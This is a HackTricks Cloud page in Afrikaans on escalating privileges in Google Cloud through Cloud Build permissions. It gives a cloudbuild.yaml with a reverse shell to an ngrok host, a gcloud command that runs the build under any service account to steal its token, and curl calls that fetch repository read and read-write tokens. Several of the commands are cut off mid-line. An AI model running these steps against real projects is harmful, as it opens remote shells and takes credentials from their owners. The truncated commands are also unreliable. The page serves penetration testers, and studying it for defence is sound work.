HackTricks CloudGCP - Cloudbuild Privesc
Tip
Leer & oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subscription plans!
- Sluit aan by die 💬 Discord group of die telegram group of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.
cloudbuild
Vir meer inligting oor Cloud Build kyk:
cloudbuild.builds.create, iam.serviceAccounts.actAs
Met hierdie toestemming kan jy ’n cloud build indien. Die cloudbuild-masjien sal in sy lêerstelsel by verstek ’n token van die cloudbuild Service Account hê: <PROJECT_NUMBER>@cloudbuild.gserviceaccount.com. Jy kan egter enige service account binne die projek aandui in die cloudbuild-konfigurasie.\ Daarom kan jy die masjien eenvoudig laat exfiltrate na jou bediener die token, of ’n reverse shell daarin kry en die token vir jouself haal (die lêer wat die token bevat, kan verander).
Direct exploitation via gcloud CLI
1- Skep cloudbuild.yaml en wysig dit met jou listener data
Cloud Build YAML configuration for reverse shell
```yaml steps: - name: bash script: | #!/usr/bin/env bash bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14965 0>&1 options: logging: CLOUD_LOGGING_ONLY ```2- Laai ’n eenvoudige build op sonder bron, die yaml-lêer en spesifiseer die SA wat by die build gebruik moet word:
Dien Cloud Build in met die gespesifiseerde service account
```bash gcloud builds submit --no-source --config="./cloudbuild.yaml" --service-account="projects/Gebruik python gcloud biblioteek
Jy kan die oorspronklike exploit script hier op GitHub vind (maar die plek waarvandaan dit die token neem het vir my nie gewerk nie). Gaan dus kyk na ’n script om die skepping, exploit en skoonmaak van ’n vuln-omgewing hier te outomatiseer en ’n python script om ’n reverse shell binne die cloudbuild-masjien te kry en steel dit hier (in die kode kan jy vind hoe om ander service accounts te spesifiseer).
Vir ’n meer diepgaande verduideliking, besoek https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/
cloudbuild.repositories.accessReadToken
Met hierdie toestemming kan die gebruiker die read access token kry wat gebruik word om toegang tot die repository te verkry:
Kry read access token vir repository
```bash curl -X POST \ -H "Authorization: Bearer $(gcloud auth print-access-token)" \ -H "Content-Type: application/json" \ -d '{}' \ "https://cloudbuild.googleapis.com/v2/projects/cloudbuild.repositories.accessReadWriteToken
Met hierdie toestemming kan die gebruiker die read and write access token kry wat gebruik word om toegang tot die repository te verkry:
Kry die read and write access token vir die repository
```bash curl -X POST \ -H "Authorization: Bearer $(gcloud auth print-access-token)" \ -H "Content-Type: application/json" \ -d '{}' \ "https://cloudbuild.googleapis.com/v2/projects/cloudbuild.connections.fetchLinkableRepositories
Met hierdie toestemming kan jy die repos kry waartoe die verbinding toegang het:
Haal koppelbare repos
```bash curl -X GET \ -H "Authorization: Bearer $(gcloud auth print-access-token)" \ "https://cloudbuild.googleapis.com/v2/projects/Tip
Leer & oefen AWS Hacking:
Leer & oefen GCP Hacking:
Leer & oefen Az Hacking:Ondersteun HackTricks
- Kyk na die subscription plans!
- Sluit aan by die 💬 Discord group of die telegram group of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.